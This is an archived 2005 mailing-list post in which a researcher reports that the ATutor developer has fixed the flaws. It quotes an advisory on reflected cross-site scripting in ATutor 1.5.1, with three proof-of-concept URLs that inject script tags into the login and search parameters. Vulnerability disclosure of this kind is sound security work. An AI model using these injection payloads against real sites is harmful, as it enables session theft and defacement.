lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Thu Aug 18 14:28:42 2005
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: Re: ATutor 1.5.1 and prior multiple XSS
	Vulnerabilities

Just to let all of you know, after i shared this bug (ATutor 1.5.1 and
prior multiple XSS Vulnerabilities) with you all, i just received an
email today from the developer of this product in reply to the
notification i sent him indicating the weaknesses. He has assured me
that the bugs have been fixed and the fixes will be included in the
next release of atutor which is scheduled sometime later.

On 8/18/05, h4cky0u <h4cky0u.org@...il.com> wrote:
> ATutor 1.5.1 and prior multiple XSS Vulnerabilities
> 
> SEVERITY:
> =========
> Medium
> 
> SOFTWARE:
> =========
> ATutor 1.5.1
> http://www.atutor.ca/
> 
> INFO:
> =====
> ATutor 1.5.1 is a web based education portal.
> 
> DESCRIPTION:
> ============
> The system is vulnerable to various XSS attacks:
> 
> 
> --==XSS==--
> 
> Some examples -
> 
> http://localhost/tour/login.php?course="><script>alert('Matrix_Killer
> r0X');</script>
> 
> http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There
> is no other place like
> 127.0.0.1');</script>&include=all&find_in=all&display_as=pages
> 
> http://localhost/tour/search.php?search=1&words="><script>alert('Found
> By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
> 
> VENDOR STATUS:
> ==============
> Vendor was contacted but no response received till date.
> 
> CREDITS:
> ========
> This vulnerability was discovered and researched by
> matrix_killer of  h4cky0u Security Forums.
> 
> mail : matrix_k at abv.bg
> 
> web : http://www.h4cky0u.org
> 
> 
> Co-Researcher:
> h4cky0u of h4cky0u Security Forums.
> 
> mail : h4cky0u at gmail.com
> 
> web : http://www.h4cky0u.org
> 
> Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
> 
> ORIGINAL:
> =========
> http://h4cky0u.org/viewtopic.php?t=2094
> 
> --
> http://www.h4cky0u.org
> (In)Security at its best...
> 


-- 
http://www.h4cky0u.org
(In)Security at its best...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ